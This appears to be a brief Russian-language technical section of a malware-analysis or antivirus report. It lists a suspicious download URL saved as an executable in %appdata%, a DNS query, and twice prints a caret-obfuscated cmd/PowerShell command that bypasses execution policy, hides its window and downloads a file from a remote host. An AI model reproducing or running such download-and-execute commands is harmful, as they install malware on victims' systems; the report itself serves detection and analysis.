Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POwerSHELL.^e^Xe^ ^-Execu^tIon^policy b^yP^Ass -^No^P^R^o^F^i^Le -^W^iNDoWs^t^ylE^ Hi^DDen (n^eW-O^B^JEct^ syStEm^.N^e^T^.^we^bCL^i^E^nT)^.dOwNL^oaD^F^i^le('http://www....
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "POwerSHELL.^e^Xe^ ^-Execu^tIon^policy b^yP^Ass -^No^P^R^o^F^i^Le -^W^iNDoWs^t^ylE^ Hi^DDen (n^eW-O^B^JEct^ syStEm^.N^e^T^.^we^bCL^i^E^nT)^.dOwNL^oaD^F^i^le('http://www....' (со скрытым окном)